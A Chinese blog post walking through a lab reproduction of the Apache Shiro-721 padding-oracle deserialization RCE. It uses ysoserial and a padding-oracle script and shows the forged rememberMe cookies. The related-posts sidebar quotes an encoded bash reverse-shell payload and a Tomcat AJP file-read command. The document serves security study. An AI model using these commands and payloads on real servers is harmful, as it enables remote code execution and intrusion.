Shiro-721漏洞复现

已于 2023-03-27 10:30:01 修改
阅读量621 收藏 2
点赞数 2
分类专栏: 漏洞复现 文章标签: 网络安全 web安全
于 2023-03-26 12:18:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51641247/article/details/129773152
版权

   Apache Shiro 存在高危代码执行漏洞。该漏洞是由于Apache Shiro cookie中通过 AES-128-CBC 模式加密的rememberMe字段存在问题,用户可通过Padding Oracle 加密生成的攻击代码来构造恶意的rememberMe字段,并重新请求网站,进行反序列化攻击,最终导致任意代码执行。

影响版本:Apache Shiro <= 1.4.1

环境搭建

docker pull vulfocus/shiro-721
docker run -d -p8080:8080 镜像id

40ae03d4f8a84f97a58dda8f83a69079.png

 漏洞复现

1.进入登录界面,访问:your-ip:8080/login.jsp

287164619ccf43f08159a3acf5b45a9d.png2.登录 Shiro 测试账户获取 Cookie(勾选Remember Me):

(1)输入错误的用户名和密码,http响应页面中会显示出deleteMe的cookie:

fb36c08e96c54a958e5e17bd0c580877.png

 (2)使用正确的用户名和密码登录,不会显示deletrMe的cookie

d1a36b0c5ac345379a6366f22b335876.png

根据以上条件我们的思路是在正常序列化数据(需要一个已知的用户凭证获取正常序列化数据)后利用 Padding Oracle 构造我们自己的数据(Java序列化数据后的脏数据不影响反序列化结果),此时会有两中情况:

  1. 构造的数据不能通过字符填充验证,返回deleteme;
  2. 构造的数据可以成功解密通过字符填充验证,之后数据可以正常反序列化,不返回deleteme的cookie.

3.使用正确的用户名密码登录,勾选RememberMe  ,进行抓包,放行登录请求包,6136a05e052240f7a64abd80b8436dd4.png

登录成功,获取得到Cookie中的rememberMe值

e925e0dc7dbf4791b630a02e0219d167.png

wq02gcYqkxw4aZ9z30n5H005AXc7VR1kzimNdOvoKVV9vFymsYEaob6I1RKtnmf3t7lJfk4M0qFr/PlYMUc9m/QxPZpRiH6cK/rlKk9FcypSysISrYCuAKsdkPqC5eUVTPHxJjbKO28si0CvIVy5gTyCCGFOXA4M9sz7olNCXV1A2F2YQgKmVCZ35s0YjQlDXNoG/4BDeVFLxlY5pluNSgJeVIX8ePR/QvO517LQW2Q0gvd9BHGwY5GYGS68KbgeE4Xm5ttphgt2N0dEkxz9ijsQgFQ6SCw36s7Ia9U9Uwe61rTXVdVEQo70YAOHckMRoQ1BSKMjp85Z/iyEdtnOlYn6FPN9LNQ9Do8SH68eMQcDbw/2ejuGra3OOsPPs6WwxSMoBZ7pS6JGAyr1RCdQEfQpMJl13tLhd6ah4SvY10TtGPdY9kDrhlt7Gx5IXiKzvoLRzqv8idF26Q2AiaGsEp2bfxChA8PYkciihxGKVsOfbBrtF/Vcn1PDIOdVuTuD

4.使用Java反序列化工具 ysoserial 生成 Payload: 这里可以生成在目标靶机根目录中创建test的payload

ysoserial-master-2874a69f61-1.jar下载链接

java -jar ysoserial-master-2874a69f61-1.jar CommonsBeanutils1 "touch /usr/local/tomcat/test" > payload.class

da3140281dc247c48ea9d8261043947f.png

 5.通过 Padding Oracle Attack生成 Evil Rememberme cookie:

shiro_rce_exp下载链接

下载好并解压

cp payload.class  shiro_rce_exp-master
cd shiro_rce_exp-master 
python shiro_exp.py http://your-ip:8080/account/  之前获取的RememberMe值   payload.class

e0b038add26b4f80b438e63ab886e67d.png

如果出现如下界面,尝试使用python2 运行一下 
python2 shiro_exp.py http://your-ip:8080/account/  之前获取的RememberMe值   payload.class

 6.接着就是漫长的等待。。。。。。。。。

注意: 此 exp 爆破时间较长,建议使用 ysoserial 生成较短的 payload 验证(如: ping 、 touch /tmp/test等),约 30多分钟可生成正确的 rememberme cookie,生成成功后将自动停止运行。

02936f12e998441f962a65494af8f65b.png

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

7.使用Evil Rememberme cookie 认证进行反序列化攻击:复制该cookie,然后重放一下数据,即可成功执行命令

将之前获取的rememberMe更改为刚才爆破出的结果,并放行

b59413cf45024986b3942e509b287c19.png

 8.检查一下执行结果,可以看到成功创建了一个test文件

docker exec -it 容器id /bin/bash

9a0fe47c5bc64aa191406285ed6b4f32.png

 复现成功

-飞飞鱼
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络安全---漏洞复现】Tomcat CVE-2024-1938 漏洞复现和利用过程(特详细)
2401_83946826的博客
04-16 1046
python2 ‘Tomcat-ROOT路径下文件读取(CVE-2020-1938).py’ -p 8009 -f /WEB-INF/web.xml 192.168.31.160。
shiro-core 低版本漏洞检测
01-31
shiro-core 低版本漏洞检测工具
网络安全---漏洞复现shiro721反序列化漏洞(CVE-2019-12422)原理与漏洞复现和利用(保姆级的详细教程)
最新发布
m0_67844671的博客
09-25 2346
shiro721反序列化漏洞(CVE-2019-12422)原理与漏洞复现和利用(保姆级的详细教程);详细还原了漏洞漏洞利用方式;Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序;
SHIRO-721:RememberMe填充Oracle漏洞RCE
03-08
SHIRO-721 RememberMe填充Oracle漏洞RCE 0x00简介: cookie的cookiememeMe已通过AES-128-CBC模式加密,这很容易受到填充oracle攻击的影响。 攻击者可以使用有效的RememberMe cookie作为填充Oracle Attack的前缀,然后制作精心制作的RememberMe来执行Java反序列化攻击,例如SHIRO-550。 0x01重现此问题的步骤: 登录网站,并从cookie中获取RememberMe。 使用RememberMe cookie作为填充Oracle Attack的前缀。 加密ysoserial的序列化有效负载,以通过填充Oracle Attack制作精心制作的RememberMe。 请求带有新的RememberMe cookie的网站,以执行反序列化攻击。 攻击者无需知道RememberMe加密的密码密钥。
Shiro-721反序列化漏洞
一醉一休的博客
10-19 5578
Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序,用户登录成功后会生成经过加密并编码的cookie。在服务端对rememberMe的cookie值,先base64解码然后AES解密再反序列化,就导致了反序列化RCE漏洞Shiro的反序列化漏洞Shiro-550与Shiro-721
Shiro-721反序列化漏洞复现总结
weixin_44283446的博客
04-20 5329
Shiro-721反序列化漏洞复现漏洞利用复现总结前言Shiro-721反序列化漏洞原理影响版本环境搭建环境说明搭建复现 前言     Apache Shiro的一些版本上存在一些高危代码执行漏洞,Apache Shiro提供的RememberMe字段,Shiro-550和Shiro-721(Apache Shiro Padding Oracle Attack)是常见的Shiro反序列化漏洞Shiro-550的复现可以查看上一篇blog:https://blog
shiro721复现
web15286201346的博客
08-24 354
花费了2/3day的时间复现和了解这个漏洞,其挖掘的思路涉及到的密码学知识挺有意思的,叫做Padding Oracle Attack,可以在公开的exp中看到这个思路。但是该漏洞的利用却十分鸡肋,它的加密方式决定了我们发送的payload越长,爆破方式去加密payload的过程越长。不建议花费时间去研究利用,exp可以学学。
shiro系列漏洞复现shiro550和shiro721漏洞
weixin_53730939的博客
03-27 858
shiro系列漏洞复现shiro550和shiro721漏洞
shiro-core-1.7.1 jar
07-12
shiro shiro-core-1.7.1 jar shiro漏洞
shiro-core-1.4.0-API文档-中文版.zip
07-12
赠送jar包:shiro-core-1.4.0.jar; 赠送原API文档:shiro-core-1.4.0-javadoc.jar; 赠送源代码shiro-core-1.4.0-sources.jar; 赠送Maven依赖信息文件:shiro-core-1.4.0.pom; 包含翻译后的API文档:shiro-core...
shiro-redis-tutorial:shiro-redis教程
05-13
shiro-redis-tutorial 这是一个教程,可帮助您了解如何使用shiro-redis 。 本教程使用shiro.ini配置shiroshiro-redis 。如何使用它? 使用以下注释将shiro-redis-tutorial克隆到磁盘: git clone ...
shiro-721反序列化漏洞复现
weixin_63960760的博客
08-22 852
密码分组链接模式(Cipher Block Chaining,CBC),其中“分组"是指加密和解密过程都是以分组进行的。每一个分组大小为128bits(16字节),如果明文的长度不是16字节的整数倍,需要对最后一个分组进行填充(padding),使得最后一个分组长度为16字节。"链接”是指密文分组像链条一样相互连接在一起。
Apache Shiro-721反序列化漏洞复现vulhub)
weixin_52685785的博客
03-27 333
使用Evil Rememberme cookie 认证进行反序列化攻击:复制该cookie,然后重放一下数据,即可成功执行命令,将之前获取的rememberMe更改为刚才爆破出的结果,并放行。python shiro_exp.py http://your-ip:8080/account/ 之前获取的RememberMe值 payload.class)通过抓包(正确的用户名与密码)并放包得到rememberMe的值,将其放入重发器。输入用户名和密码并勾选记住密码。可是因为内存不足无法进入容器。
『PHP代码审计』PHPOK5.7.140存在命令执行漏洞
Ho1aAs‘s Blog
06-02 1144
文章目录一、漏洞演示二、漏洞分析三、总结完 作者:Ho1aAs 博客:https://blog.csdn.net/Xxy605 一、漏洞演示 访问PHPOK CMS的后台,选择左侧的文件管理,页面提示需要输入管理员二次密码进行验证才能进入界面 选择右上角管理员头像,打开修改密码界面 在管理员密码修改界面,发现可以随意更改二次密码,而无需验证 那么可以随意更改、覆盖原二次密码,就绕过了二次密码验证,从而得以进入文件管理 输入二次密码,通过验证,进入文件管理 点击右上的创建文件,新建一个空的php文
《QDebug 2020年3月》
龚建波
03-05 399
一、Qt Widgets 问题交流 二、Qt Quick 问题交流 1.Control2的Menu弹出的时候,Map地图上有个白色块 Control2的Menu弹出的时候,Map地图上有个白色块,无论Menu是否在地图组件之内,待解决。 (如下图左侧) ...
Apache Dubbo(CVE-2019-17564) Java反序列化漏洞复现笔记(最详细版本)
精品博客,你值得一看~
08-25 912
java -jar ysoserial-master-2874a69f61-1.jar CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE4NC4xMzYvODg4OCAwPiYx}|{base64,-d}|{bash,-i}" > 2.poc #生成反弹shell的脚本2.poc ,这里将刚刚复制的内容贴到双引号里面执行
shiro-721漏洞复现
qq_53409748的博客
03-28 605
Apache Shiro 存在高危代码执行漏洞。该漏洞是由于Apache Shiro cookie中通过 AES-128-CBC 模式加密的rememberMe字段存在问题,用户可通过Padding Oracle 加密生成的攻击代码来构造恶意的rememberMe字段,并重新请求网站,进行反序列化攻击,最终导致任意代码执行
Shiro721漏洞复现(自动化工具使用&&详细教程)
m0_52701599的博客
03-26 1511
Shiro721漏洞复现(自动化工具使用&&详细教程)
shiro-550和shiro-721漏洞的异同点
06-06
Shiro-550和Shiro-721漏洞都是Apache Shiro框架的安全漏洞,但它们的漏洞类型和漏洞影响不同。 Shiro-550漏洞是Apache Shiro框架中的一种远程代码执行漏洞,攻击者可以通过构造恶意的序列化数据包,触发远程代码...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值